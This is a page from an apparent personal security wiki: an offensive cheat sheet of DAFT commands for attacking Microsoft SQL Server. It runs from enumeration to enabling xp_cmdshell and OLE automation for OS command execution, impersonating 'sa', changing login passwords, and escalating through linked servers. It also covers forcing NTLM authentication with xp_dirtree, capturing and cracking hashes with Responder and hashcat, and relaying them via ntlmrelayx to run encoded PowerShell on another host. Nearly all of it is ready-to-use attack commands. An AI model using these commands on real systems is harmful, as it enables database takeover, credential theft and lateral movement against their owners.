AJ-Labz
  • whoami
  • The Lab
    • Building the Lab
      • Physical Hardware
      • ESXi
        • Install ESXi without a keyboard
      • vCenter Server Installation
      • Configure vCenter Datacenter
      • Virtual Networking
      • Install Virtual Machine
      • Install Virtual Firewall
      • Increasing VM Harddrive size
    • Building the Windows Domain
    • Building a Local DNS Server
    • Installing Apache Guacamole
    • Installing WireGuard VPN
    • Industrial Control Systems (ICS)
  • Defensive Cyberz
  • Analytic Repo
    • Beacon Detection
  • Creating an SIEM
    • Installing Security Onion (SO)
    • Splunk
    • Getting the Windows Data You Need
  • Zeek || Bro
    • Bro/Zeek Script
    • Installing Protocol Analyzers
  • Offensive Cyberz
    • Cobalt Strike Red Team Cheat Sheet
    • Defense Evasion
      • Evading Defender with CobaltStrike
      • Disable AV
      • AMSI Bypass
      • Evade Heuristic Behaviors
        • Process Injection
        • Process Hollowing
        • Reflection
        • AppLocker Bypass
        • Powershell CLM Bypass
      • Linux Shellcode Encoders
    • AD Enumeration
      • AD Tools
      • PowerView
      • BloodHound
      • DAFT Commands
      • Enumeration Commands
    • AD Attack
      • Prompt for Credentials
      • LAPS Reader
      • Abusing ACLs
    • Command and Control
      • Covenant Framework
      • Simple HTTPS Server
    • Linux
      • Shells
      • Impacket
      • SSH
      • Kerberos Cache File
      • Ansible
      • Privilege Escalation
    • Phishing
      • LNK Script
    • Wireless Attacks
    • Create a Trojan
  • Cyber Readingz
    • Recommended Readings
Powered by GitBook
On this page
  • Generic Info
  • List Databases and Owners
  • Checks for some Excessive Privileges, only found Database Ownership Chaining
  • Basic server information
  • Lists links
  • Link crawling
  • Lists sysadmins
  • Using specific DB Creds
  • Impersonation
  • Found this uncertain of output exactly
  • Change a users password
  • OLE Stored Procedure
  • XP cmd shell
  • COMMAND EXECUTION - LOCAL - XP COMMAND SHELL
  • UNC Injection
  • DAFT Built in CMD Execution
  • Linked PrivEsc
  • Linked Servers XP cmd shell
  • Linked Servers xp cmd shell - openquery
  • Add Linkded Login
  • ALTER Role cmd
  • Enable RPC

Was this helpful?

  1. Offensive Cyberz
  2. AD Enumeration

DAFT Commands

Generic Info

daft.exe -i <SQL SERVER> -d master -m query -q "select system_user;"
daft.exe -i <SQL SERVER> -d master -m query -q "SELECT LEFT(@@version, CHARINDEX(' - ', @@version)) ProductName;"
daft.exe -i <SQL SERVER> -d master -m query -q "SELECT IS_SRVROLEMEMBER('sysadmin');"
daft.exe -i <SQL SERVER> -d master -m query -q "SELECT IS_SRVROLEMEMBER('sysadmin');"

List Databases and Owners

DAFT.exe -i <SQL SERVER> -d master -m Database | findstr "DatabaseName && DatabaseOwner"

Checks for some Excessive Privileges, only found Database Ownership Chaining

DAFT.exe -i <SQL SERVER> -d master -m AuditPrivDbChaining

Basic server information

DAFT.exe -i <SQL SERVER> -d master -m ServerInfo

Lists links

DAFT.exe -i <SQL SERVER> -d master -m ServerLink

Link crawling

DAFT.exe -i <SQL SERVER> -d master -m ServerLinkCrawl

Lists granted permissions

DAFT.exe -i <SQL SERVER> -d master -m ServerPriv

Lists sysadmins

DAFT.exe -i <SQL SERVER> -d master -m ServerRoleMember

Using specific DB Creds

daft.exe -i <SQL SERVER> -d master -e USER:PASSWORD -m query -q "EXEC ('xp_cmdshell ''whoami'';') AT <SQL SERVER>;"

Impersonation

daft.exe -i <SQL SERVER> -d msdb -m query -q "SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE';"

Found this uncertain of output exactly

daft.exe -i <SQL SERVER> -d music -m query -q "SELECT grantee_principal.name AS WhoCanImpersonate ,grantee_principal.type_desc AS ImpersonatorType ,sp.name AS WhoCanTheyImpersonate ,sp.type_desc AS ImpersonateeLoginType FROM sys.server_permissions AS prmssn INNER JOIN sys.server_principals AS sp ON sp.principal_id = prmssn.major_id AND prmssn.class = 101 INNER JOIN sys.server_principals AS grantee_principal ON grantee_principal.principal_id = prmssn.grantee_principal_id WHERE prmssn.state = 'G'"

Change a users password

daft.exe -i <SQL SERVER> -d master -m query -q "ALTER LOGIN sqlUsername WITH PASSWORD = N'qwer1234QWER!@#$';"

OLE Stored Procedure

daft.exe -i <SQL SERVER> -d master -e 'USERNAME:PASSWORD' -m query -q "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;DECLARE @myshell INT; EXEC sp_oacreate 'wscript.shell', @myshell OUTPUT; EXEC sp_oamethod @myshell, 'run', null,'ping 192.168.49.59'"

XP cmd shell

daft.exe -i <SQL SERVER> -d master -e USERNAME:PASSWORD -m query -q "EXEC sp_configure 'show advanced options', 1; reconfigure;'"

daft.exe -i <SQL SERVER> -d master -e USERNAME:PASSWORD -m query -q "EXEC sp_configure 'xp_cmdshell', 1; reconfigure;'"

daft.exe -i <SQL SERVER> -d master -e USERNAME:PASSWORD -m query -q "EXEC xp_cmdshell 'whoami';"

COMMAND EXECUTION - LOCAL - XP COMMAND SHELL

daft.exe -i <SQL SERVER> -d master -m query -q "EXECUTE AS LOGIN = 'sa'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell ipconfig;"

UNC Injection

daft.exe -i <SQL SERVER> -d master -m query -q "EXEC master..xp_dirtree \"\\192.168.X.Y\test\";"

Capture NTLM Relay hash

Set up responder ad get NTML relay hash

responder -I tun0

crack it with hashcat

 hashcat -m 5600 sqlsvc_hash.txt /usr/share/wordlists/rockyou.txt --force

Relay hash for code execution

impacket ntlmrelay

python3 ntlmrelayx.py --no-http-server -smb2support -t 172.16.98.152 -c 'powershell -enc <ENDOCDED COMMAND>'

DAFT Built in CMD Execution

daft.exe -i "<SQL SERVER>" -m OSCmd -q whoami

Linked PrivEsc

daft.exe -i <SQL SERVER> -d master -m query -q "EXEC ('EXEC (''sp_configure ''''show advanced options'''', 1; reconfigure;'') AT <LINKED SQL SERVER>') AT <FIRST SQL SERVER>"

daft.exe -i <SQL SERVER> -d master -m query -q "EXEC ('EXEC (''sp_configure ''''xp_cmdshell'''', 1; reconfigure;'') AT <LINKED SQL SERVER>') AT <FIRST SQL SERVER>"

daft.exe -i <SQL SERVER> -d master -m query -q "EXEC ('EXEC (''xp_cmdshell ''''whoami'''';'') AT <LINKED SQL SERVER>') AT <FIRST SQL SERVER>"

Linked Servers XP cmd shell

daft.exe -i <SQL SERVER> -d master -m query -q "EXEC ('sp_configure ''show advanced options'', 1; reconfigure;') AT <SQL SERVER>;"

daft.exe -i <SQL SERVER> -d master -m query -q "EXEC ('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT <SQL SERVER>;"

daft.exe -i <SQL SERVER> -d master -m query -q "EXEC ('xp_cmdshell ''" + command + "'';') AT <SQL SERVER>;"

Linked Servers xp cmd shell - openquery

daft.exe -i <SQL SERVER> -d master -m query -q "SELECT 1 FROM openquery(<SQL SERVER>,'SELECT 1;EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;')"

daft.exe -i <SQL SERVER> -d master -m query -q "SELECT 1 FROM openquery(<SQL SERVER>,'SELECT 1;EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;')"

daft.exe -i <SQL SERVER> -d master -m query -q "SELECT 1 FROM openquery(<SQL SERVER>,'SELECT 1;EXEC master..xp_cmdshell ''whoami'';')"

**
daft.exe -i <SQL SERVER> -d master -m query -q "SELECT * FROM OPENQUERY([<SQL SERVER>],'Select @@Servername SYSTEM_USER')"

Add Linkded Login

daft.exe -i <SQL SERVER> -d master -m query -q "EXEC master.dbo.sp_addlinkedserver @server = N'<SQL SERVER>', @provider=N'SQLNCLI', @datasrc=N'<SQL SERVER>';" 

daft.exe -i <SQL SERVER> -d master -m query -q "EXEC master.dbo.sp_addlinkedsrvlogin @rmtsrvname = 
N'<SQL SERVER>', @locallogin = NULL , @useself = N'True', @rmtuser=N'asdf',@rmtpassword=N'asdfasdfasdf';;"

ALTER Role cmd

daft.exe -i <SQL SERVER> -d master -m query -q "EXEC ('ALTER ROLE db_owner ADD MEMBER aids;') AT <SQL SERVER>;"

Enable RPC

daft.exe -i <SQL SERVER> -d master -m query -q "EXECUTE AS LOGIN = 'sa'; EXEC sp_serveroption '<SQLSERVER>', 'rpc out', 'true';EXEC ('sp_configure ''show advanced options'', 1; reconfigure;') AT <SQLSERVER>;"
PreviousBloodHoundNextEnumeration Commands

Last updated 3 years ago

Was this helpful?